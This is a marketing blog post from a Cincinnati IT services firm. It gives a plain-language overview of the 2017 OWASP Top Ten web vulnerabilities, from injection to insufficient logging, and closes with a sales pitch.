To be forewarned is to be forearmed. The more that you know about the potential cybersecurity threats that every internet user faces, the better prepared you will be to combat them. In the area of web application security, nobody does it better than the Open Web Application Security Project (OWASP). The OWASP Foundation may be best known for its OWASP Top Ten list, a collection of web application vulnerabilities that it updates every few years. We’ll give you a brief introduction, but you may want to study the subject more in-depth on you own.
The latest version of the OWASP Top Ten was published in 2017. Here is how they describe the list on the OWASP web page:
“The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications.”
Businesses needing Cincinnati IT services can benefit from the support of Titan Tech with the web applications that they are either using or deploying. We can identify vulnerabilities and help you find ways to correct them.
A1:2017 - Injection
Despite all the hype, computers are stupid. They will do exactly what you tell them to do -- so long as it’s within their preconfigured parameters. Injection occurs when a hacker adds extra command information to an input field so that the server executes unauthorized actions. It’s a very common hack (especially SQL infection), and one that a security-conscious developer should be able to prevent. But it’s probably not going away any time soon.
A2:2017 - Broken Authentication
This is another term for password hacking. If a cyber criminal manages to intercept or guess your password, he may have all he needs to access your important data. Experts recommend that you do everything you can to protect your password. Don’t share it with anyone. Make sure you use strong passwords, and consider adding multifactor authentication when you have the opportunity.
A3:2017 - Sensitive Data Exposure
You wouldn’t leave your door unlocked at night, but unfortunately some web administrators have left sensitive data unprotected. Even small businesses can house a lot of confidential information that could be a prime target for hackers. If a dog grooming company collects credit card information and leaves it on an unprotected server, they’re leaving the door open for interested cyber thieves to freely enter.
A4:2017 - XML External Entities (XXE)
Web applications routinely use XML databases to collect and store data. Unfortunately, some XML data parsers will spit out protected data if the software is not configured properly. Knowledgeable hackers will enter malicious code to try and coax out the sensitive information. One way to prevent this is to disable XML external entity processing.
A5:2017 - Broken Access Control
Each user of an application is given a certain level of access. Some may have read-only access, while others can write to the database. Application owners will have admin access. Broken access control is when someone manages to get a higher access than he’s supposed to. With elevated privileges, an unscrupulous user can do all kinds of things in the application that he’s not supposed to do.
A6:2017 - Security Misconfiguration
Servers and software packages come with default settings. The problem is that some of those settings may make your system more vulnerable to attack. This is particularly risky if you get something off the shelf that may be a year or so old. Since it was put on the market, designers have likely discovered security flaws that must be addressed. That’s why it’s important to do updates immediately upon installation. That said, security misconfigurations anywhere in the IT infrastructure can leave a web application exposed.
A7:2017 - Cross-Site Scripting (XSS)
Web pages should not be running any script other than what the software coder has written. But cross-site scripting happens when a hacker puts his own script into a web form field in an attempt to extract data. A hacker’s script might be entered into a freeform field such as a comment box. For example, if he enters , he may succeed in giving commands to the server.
A8:2017 - Insecure Deserialization
Web applications manipulate and convert streams of data in various ways between the user and the server. Serialization and deserialization are part of this process. This hack occurs when the data is deserialized in a way that it is left unprotected. One way to prevent this is the use of digital signatures.
A9:2017 - Using Components with Known
Website owners must make sure that all the elements of their web applications are secure. That goes for any hardware or software components used by the website. The problem occurs when web administrators don’t keep abreast of all the market information on the products that they use. If experts have identified some of those components as risky, then of course they should not use them.
A10:2017 – Insufficient Logging & Monitoring
Not every web vulnerability is linked to malicious hacking. Sometimes it’s just a matter of a system that is not properly controlled. This last web application threat deals with the lack of tools to track what is happening on a daily basis. While server logs can be used to determine whether a site has been hacked, they can also help IT administrators identify events that signify potential risks. Monitoring systems with properly configured thresholds can also quickly alert techs to problems in the system.
This material may be a bit over the head of the average business owner. That’s a good reason to look to Titan Tech for cybersecurity support if you are in the Cincinnati or Dayton area. Contact us today with all your web application security needs.